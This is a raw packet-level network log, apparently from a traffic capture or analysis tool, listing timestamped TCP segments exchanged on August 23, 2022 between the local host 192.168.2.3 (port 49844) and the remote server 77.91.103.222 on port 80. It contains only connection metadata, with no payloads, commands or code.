Aug 23, 2022 18:24:03.704679966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704699039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704720974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704742908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704762936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704767942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704771996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704787016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704807997 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704832077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704843998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704866886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704910040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704915047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704929113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704997063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705022097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705079079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705085993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705117941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705142975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705177069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705190897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705244064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705255032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705260992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705284119 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705327034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705372095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705389023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705394030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705431938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705459118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705486059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705527067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705554962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705565929 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705570936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705635071 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705697060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705756903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705789089 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705813885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705863953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705884933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705903053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705915928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705938101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.705950975 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.705990076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706049919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706109047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706132889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706243992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706254959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706307888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706329107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706343889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706424952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706449032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706486940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706551075 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706576109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706615925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706625938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706629038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706655025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706702948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706772089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706801891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706830025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706856012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706897974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706924915 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.706939936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706948042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.706953049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707076073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707101107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707134008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707159996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707185984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707211018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707236052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707257032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707262039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707266092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707279921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707338095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707389116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707420111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707431078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707436085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707438946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707462072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707487106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707499981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707504034 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707528114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707552910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707611084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707616091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707619905 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707658052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707756042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707781076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707807064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707854033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707863092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.707910061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.707950115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708074093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708101034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708163023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708172083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708200932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708288908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708316088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708359003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708398104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708515882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708524942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708542109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708637953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708667994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708739996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708767891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.708851099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.708975077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709105968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709197998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709225893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709290028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709297895 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709331989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709362984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709393978 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709425926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709506035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709511042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709539890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709573984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709647894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709711075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709786892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.709876060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.709965944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710113049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710144043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710216045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710566044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710678101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710712910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710751057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710757017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710760117 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710773945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710798979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710824013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710861921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710867882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710891008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710917950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.710939884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710944891 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.710987091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711044073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711054087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711138010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711417913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711489916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711498976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711503983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711505890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711527109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711576939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711637974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711682081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711726904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711733103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711736917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.711745977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711832047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.711874962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712095976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712125063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712178946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712188005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712193012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712241888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712266922 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712306023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712368965 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712492943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712517023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712547064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712553978 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712558031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712574005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712585926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712609053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712635040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712658882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712685108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712718010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712740898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712822914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.712855101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.712949991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.713052034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.713093042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.713109970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.713139057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.713196993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.713231087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.713260889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.713294029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.713660955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.715142965 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.715179920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.715209007 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.715241909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.715253115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.715451956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.715919971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.716021061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.719729900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.719762087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.719784021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.719954967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.719978094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720010042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720093966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720118046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720199108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720221043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720278025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720680952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.720923901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.720949888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.721023083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.721029997 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.721296072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.721396923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.721630096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.721791983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.721822977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.721985102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722127914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722280979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722410917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722445011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722469091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722798109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.722855091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.722882032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723005056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723339081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723392963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723419905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723450899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723509073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723710060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.723826885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.723881960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724024057 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724045992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724148989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724185944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724194050 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724253893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724280119 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724314928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724335909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724343061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724369049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724468946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724500895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724529028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724550962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724605083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724620104 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724772930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724786997 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.724812984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724905968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.724919081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725104094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725136995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725162983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725188971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725263119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725272894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725277901 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725445986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725492954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725542068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725568056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725616932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725625038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725630045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725698948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725904942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.725923061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.725944042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726011992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726017952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726042032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726083040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726094007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726116896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726201057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726227999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726272106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726314068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726334095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726372004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726399899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726438999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726538897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726567984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726663113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726726055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726752996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726783991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726883888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726907969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.726943970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726952076 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.726984024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727009058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727037907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727154970 CEST	80	49844	77.91.103.222	192.168.2.3
